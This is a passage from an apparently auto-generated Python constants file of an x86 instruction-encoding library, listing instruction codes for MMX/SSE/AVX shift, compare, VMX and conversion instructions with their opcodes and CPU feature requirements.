``16/32/64-bit``
"""
PSRLW_MM_IMM8: int = 1631
"""
``PSRLW mm, imm8``
``NP 0F 71 /2 ib``
``MMX``
``16/32/64-bit``
"""
PSRLW_XMM_IMM8: int = 1632
"""
``PSRLW xmm1, imm8``
``66 0F 71 /2 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLW_XMM_XMM_IMM8: int = 1633
"""
``VPSRLW xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 71 /2 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLW_YMM_YMM_IMM8: int = 1634
"""
``VPSRLW ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 71 /2 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLW_XMM_K1Z_XMMM128_IMM8: int = 1635
"""
``VPSRLW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 71 /2 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_YMM_K1Z_YMMM256_IMM8: int = 1636
"""
``VPSRLW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 71 /2 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_ZMM_K1Z_ZMMM512_IMM8: int = 1637
"""
``VPSRLW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 71 /2 ib``
``AVX512BW``
``16/32/64-bit``
"""
PSRAW_MM_IMM8: int = 1638
"""
``PSRAW mm, imm8``
``NP 0F 71 /4 ib``
``MMX``
``16/32/64-bit``
"""
PSRAW_XMM_IMM8: int = 1639
"""
``PSRAW xmm1, imm8``
``66 0F 71 /4 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAW_XMM_XMM_IMM8: int = 1640
"""
``VPSRAW xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 71 /4 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAW_YMM_YMM_IMM8: int = 1641
"""
``VPSRAW ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 71 /4 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAW_XMM_K1Z_XMMM128_IMM8: int = 1642
"""
``VPSRAW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 71 /4 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_YMM_K1Z_YMMM256_IMM8: int = 1643
"""
``VPSRAW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 71 /4 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_ZMM_K1Z_ZMMM512_IMM8: int = 1644
"""
``VPSRAW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 71 /4 ib``
``AVX512BW``
``16/32/64-bit``
"""
PSLLW_MM_IMM8: int = 1645
"""
``PSLLW mm1, imm8``
``NP 0F 71 /6 ib``
``MMX``
``16/32/64-bit``
"""
PSLLW_XMM_IMM8: int = 1646
"""
``PSLLW xmm1, imm8``
``66 0F 71 /6 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLW_XMM_XMM_IMM8: int = 1647
"""
``VPSLLW xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 71 /6 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLW_YMM_YMM_IMM8: int = 1648
"""
``VPSLLW ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 71 /6 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLW_XMM_K1Z_XMMM128_IMM8: int = 1649
"""
``VPSLLW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 71 /6 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_YMM_K1Z_YMMM256_IMM8: int = 1650
"""
``VPSLLW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 71 /6 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_ZMM_K1Z_ZMMM512_IMM8: int = 1651
"""
``VPSLLW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 71 /6 ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPRORD_XMM_K1Z_XMMM128B32_IMM8: int = 1652
"""
``VPRORD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORD_YMM_K1Z_YMMM256B32_IMM8: int = 1653
"""
``VPRORD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1654
"""
``VPRORD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /0 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORQ_XMM_K1Z_XMMM128B64_IMM8: int = 1655
"""
``VPRORQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORQ_YMM_K1Z_YMMM256B64_IMM8: int = 1656
"""
``VPRORQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1657
"""
``VPRORQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 72 /0 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLD_XMM_K1Z_XMMM128B32_IMM8: int = 1658
"""
``VPROLD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLD_YMM_K1Z_YMMM256B32_IMM8: int = 1659
"""
``VPROLD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1660
"""
``VPROLD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /1 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1661
"""
``VPROLQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1662
"""
``VPROLQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1663
"""
``VPROLQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 72 /1 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRLD_MM_IMM8: int = 1664
"""
``PSRLD mm, imm8``
``NP 0F 72 /2 ib``
``MMX``
``16/32/64-bit``
"""
PSRLD_XMM_IMM8: int = 1665
"""
``PSRLD xmm1, imm8``
``66 0F 72 /2 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLD_XMM_XMM_IMM8: int = 1666
"""
``VPSRLD xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 72 /2 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLD_YMM_YMM_IMM8: int = 1667
"""
``VPSRLD ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 72 /2 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLD_XMM_K1Z_XMMM128B32_IMM8: int = 1668
"""
``VPSRLD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_YMM_K1Z_YMMM256B32_IMM8: int = 1669
"""
``VPSRLD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1670
"""
``VPSRLD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /2 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRAD_MM_IMM8: int = 1671
"""
``PSRAD mm, imm8``
``NP 0F 72 /4 ib``
``MMX``
``16/32/64-bit``
"""
PSRAD_XMM_IMM8: int = 1672
"""
``PSRAD xmm1, imm8``
``66 0F 72 /4 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAD_XMM_XMM_IMM8: int = 1673
"""
``VPSRAD xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 72 /4 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAD_YMM_YMM_IMM8: int = 1674
"""
``VPSRAD ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 72 /4 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAD_XMM_K1Z_XMMM128B32_IMM8: int = 1675
"""
``VPSRAD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_YMM_K1Z_YMMM256B32_IMM8: int = 1676
"""
``VPSRAD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1677
"""
``VPSRAD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /4 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_XMM_K1Z_XMMM128B64_IMM8: int = 1678
"""
``VPSRAQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_YMM_K1Z_YMMM256B64_IMM8: int = 1679
"""
``VPSRAQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1680
"""
``VPSRAQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 72 /4 ib``
``AVX512F``
``16/32/64-bit``
"""
PSLLD_MM_IMM8: int = 1681
"""
``PSLLD mm, imm8``
``NP 0F 72 /6 ib``
``MMX``
``16/32/64-bit``
"""
PSLLD_XMM_IMM8: int = 1682
"""
``PSLLD xmm1, imm8``
``66 0F 72 /6 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLD_XMM_XMM_IMM8: int = 1683
"""
``VPSLLD xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 72 /6 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLD_YMM_YMM_IMM8: int = 1684
"""
``VPSLLD ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 72 /6 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLD_XMM_K1Z_XMMM128B32_IMM8: int = 1685
"""
``VPSLLD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_YMM_K1Z_YMMM256B32_IMM8: int = 1686
"""
``VPSLLD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1687
"""
``VPSLLD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /6 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRLQ_MM_IMM8: int = 1688
"""
``PSRLQ mm, imm8``
``NP 0F 73 /2 ib``
``MMX``
``16/32/64-bit``
"""
PSRLQ_XMM_IMM8: int = 1689
"""
``PSRLQ xmm1, imm8``
``66 0F 73 /2 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLQ_XMM_XMM_IMM8: int = 1690
"""
``VPSRLQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /2 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLQ_YMM_YMM_IMM8: int = 1691
"""
``VPSRLQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /2 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1692
"""
``VPSRLQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 73 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1693
"""
``VPSRLQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 73 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1694
"""
``VPSRLQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 73 /2 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRLDQ_XMM_IMM8: int = 1695
"""
``PSRLDQ xmm1, imm8``
``66 0F 73 /3 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLDQ_XMM_XMM_IMM8: int = 1696
"""
``VPSRLDQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /3 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLDQ_YMM_YMM_IMM8: int = 1697
"""
``VPSRLDQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /3 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLDQ_XMM_XMMM128_IMM8: int = 1698
"""
``VPSRLDQ xmm1, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 73 /3 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLDQ_YMM_YMMM256_IMM8: int = 1699
"""
``VPSRLDQ ymm1, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 73 /3 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLDQ_ZMM_ZMMM512_IMM8: int = 1700
"""
``VPSRLDQ zmm1, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 73 /3 ib``
``AVX512BW``
``16/32/64-bit``
"""
PSLLQ_MM_IMM8: int = 1701
"""
``PSLLQ mm, imm8``
``NP 0F 73 /6 ib``
``MMX``
``16/32/64-bit``
"""
PSLLQ_XMM_IMM8: int = 1702
"""
``PSLLQ xmm1, imm8``
``66 0F 73 /6 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLQ_XMM_XMM_IMM8: int = 1703
"""
``VPSLLQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /6 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLQ_YMM_YMM_IMM8: int = 1704
"""
``VPSLLQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /6 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1705
"""
``VPSLLQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 73 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1706
"""
``VPSLLQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 73 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1707
"""
``VPSLLQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 73 /6 ib``
``AVX512F``
``16/32/64-bit``
"""
PSLLDQ_XMM_IMM8: int = 1708
"""
``PSLLDQ xmm1, imm8``
``66 0F 73 /7 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLDQ_XMM_XMM_IMM8: int = 1709
"""
``VPSLLDQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /7 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLDQ_YMM_YMM_IMM8: int = 1710
"""
``VPSLLDQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /7 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLDQ_XMM_XMMM128_IMM8: int = 1711
"""
``VPSLLDQ xmm1, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 73 /7 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLDQ_YMM_YMMM256_IMM8: int = 1712
"""
``VPSLLDQ ymm1, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 73 /7 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLDQ_ZMM_ZMMM512_IMM8: int = 1713
"""
``VPSLLDQ zmm1, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 73 /7 ib``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQB_MM_MMM64: int = 1714
"""
``PCMPEQB mm, mm/m64``
``NP 0F 74 /r``
``MMX``
``16/32/64-bit``
"""
PCMPEQB_XMM_XMMM128: int = 1715
"""
``PCMPEQB xmm1, xmm2/m128``
``66 0F 74 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPEQB_XMM_XMM_XMMM128: int = 1716
"""
``VPCMPEQB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 74 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQB_YMM_YMM_YMMM256: int = 1717
"""
``VPCMPEQB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 74 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQB_KR_K1_XMM_XMMM128: int = 1718
"""
``VPCMPEQB k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 74 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQB_KR_K1_YMM_YMMM256: int = 1719
"""
``VPCMPEQB k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 74 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQB_KR_K1_ZMM_ZMMM512: int = 1720
"""
``VPCMPEQB k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 74 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQW_MM_MMM64: int = 1721
"""
``PCMPEQW mm, mm/m64``
``NP 0F 75 /r``
``MMX``
``16/32/64-bit``
"""
PCMPEQW_XMM_XMMM128: int = 1722
"""
``PCMPEQW xmm1, xmm2/m128``
``66 0F 75 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPEQW_XMM_XMM_XMMM128: int = 1723
"""
``VPCMPEQW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 75 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQW_YMM_YMM_YMMM256: int = 1724
"""
``VPCMPEQW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 75 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQW_KR_K1_XMM_XMMM128: int = 1725
"""
``VPCMPEQW k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQW_KR_K1_YMM_YMMM256: int = 1726
"""
``VPCMPEQW k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQW_KR_K1_ZMM_ZMMM512: int = 1727
"""
``VPCMPEQW k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 75 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQD_MM_MMM64: int = 1728
"""
``PCMPEQD mm, mm/m64``
``NP 0F 76 /r``
``MMX``
``16/32/64-bit``
"""
PCMPEQD_XMM_XMMM128: int = 1729
"""
``PCMPEQD xmm1, xmm2/m128``
``66 0F 76 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPEQD_XMM_XMM_XMMM128: int = 1730
"""
``VPCMPEQD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 76 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQD_YMM_YMM_YMMM256: int = 1731
"""
``VPCMPEQD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 76 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQD_KR_K1_XMM_XMMM128B32: int = 1732
"""
``VPCMPEQD k1 {k2}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQD_KR_K1_YMM_YMMM256B32: int = 1733
"""
``VPCMPEQD k1 {k2}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQD_KR_K1_ZMM_ZMMM512B32: int = 1734
"""
``VPCMPEQD k1 {k2}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 76 /r``
``AVX512F``
``16/32/64-bit``
"""
EMMS: int = 1735
"""
``EMMS``
``NP 0F 77``
``MMX``
``16/32/64-bit``
"""
VEX_VZEROUPPER: int = 1736
"""
``VZEROUPPER``
``VEX.128.0F.WIG 77``
``AVX``
``16/32/64-bit``
"""
VEX_VZEROALL: int = 1737
"""
``VZEROALL``
``VEX.256.0F.WIG 77``
``AVX``
``16/32/64-bit``
"""
VMREAD_RM32_R32: int = 1738
"""
``VMREAD r/m32, r32``
``NP 0F 78 /r``
``VMX``
``16/32-bit``
"""
VMREAD_RM64_R64: int = 1739
"""
``VMREAD r/m64, r64``
``NP 0F 78 /r``
``VMX``
``64-bit``
"""
EVEX_VCVTTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1740
"""
``VCVTTPS2UDQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1741
"""
``VCVTTPS2UDQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UDQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1742
"""
``VCVTTPS2UDQ zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.0F.W0 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1743
"""
``VCVTTPD2UDQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.0F.W1 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1744
"""
``VCVTTPD2UDQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.0F.W1 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UDQ_YMM_K1Z_ZMMM512B64_SAE: int = 1745
"""
``VCVTTPD2UDQ ymm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.0F.W1 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EXTRQ_XMM_IMM8_IMM8: int = 1746
"""
``EXTRQ xmm1, imm8, imm8``
``66 0F 78 /0 ib ib``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1747
"""
``VCVTTPS2UQQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1748
"""
``VCVTTPS2UQQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UQQ_ZMM_K1Z_YMMM256B32_SAE: int = 1749
"""
``VCVTTPS2UQQ zmm1 {k1}{z}, ymm2/m256/m32bcst{sae}``
``EVEX.512.66.0F.W0 78 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1750
"""
``VCVTTPD2UQQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1751
"""
``VCVTTPD2UQQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UQQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1752
"""
``VCVTTPD2UQQ zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 78 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTSS2USI_R32_XMMM32_SAE: int = 1753
"""
``VCVTTSS2USI r32, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W0 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSS2USI_R64_XMMM32_SAE: int = 1754
"""
``VCVTTSS2USI r64, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W1 78 /r``
``AVX512F``
``64-bit``
"""
INSERTQ_XMM_XMM_IMM8_IMM8: int = 1755
"""
``INSERTQ xmm1, xmm2, imm8, imm8``
``F2 0F 78 /r ib ib``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTTSD2USI_R32_XMMM64_SAE: int = 1756
"""
``VCVTTSD2USI r32, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W0 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSD2USI_R64_XMMM64_SAE: int = 1757
"""
``VCVTTSD2USI r64, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W1 78 /r``
``AVX512F``
``64-bit``
"""
VMWRITE_R32_RM32: int = 1758
"""
``VMWRITE r32, r/m32``
``NP 0F 79 /r``
``VMX``
``16/32-bit``
"""
VMWRITE_R64_RM64: int = 1759
"""
``VMWRITE r64, r/m64``
``NP 0F 79 /r``
``VMX``
``64-bit``
"""
EVEX_VCVTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1760
"""
``VCVTPS2UDQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1761
"""
``VCVTPS2UDQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2UDQ_ZMM_K1Z_ZMMM512B32_ER: int = 1762
"""
``VCVTPS2UDQ zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.0F.W0 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1763
"""
``VCVTPD2UDQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.0F.W1 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1764
"""
``VCVTPD2UDQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.0F.W1 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2UDQ_YMM_K1Z_ZMMM512B64_ER: int = 1765
"""
